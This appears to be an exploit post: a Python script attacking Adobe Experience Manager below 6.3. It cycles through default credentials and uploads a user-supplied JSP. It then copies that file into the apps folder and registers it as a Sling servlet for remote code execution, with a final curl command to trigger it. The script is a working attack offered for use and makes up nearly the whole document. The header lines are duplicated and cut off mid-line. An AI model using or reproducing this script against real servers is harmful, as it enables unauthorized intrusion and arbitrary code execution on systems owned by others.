Adobe Experience Manager AEM Remote Code Execution

# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
# Date: 5/19/18
# Exploit Author: StaticFlow
# Vendor Homepage: https://www.adobe.com/in/market # Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
# Date: 5/19/18
# Exploit Author: StaticFlow
# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
# Version: < 6.3
import requests
import sys

baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line

def testLogins():
for credential in credentialList:
response = requests.get(baseUrl, auth=(credential[0], credential[1]))
if(response.status_code == 200):
return credential
return False

if len(sys.argv) == 2:
baseUrl = sys.argv[1]
if len(sys.argv) == 3:
exploit = sys.argv[2]

gotCreds = testLogins()
if(gotCreds):
attackChain = [
{
'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
},
{
'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
},
{
':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
':dest': (None, '/apps/rcetype')
},
{
'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
}
]
print "creating folder structure and uploading exploit"
for attack in attackChain[:-1]:
response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
if response.status_code > 201:
print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
print response.content
sys.exit(0)

print "initializing servlet from exploit"
response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
if response.status_code > 201:
print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
print response.content
sys.exit(0)
print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')


Leave a comment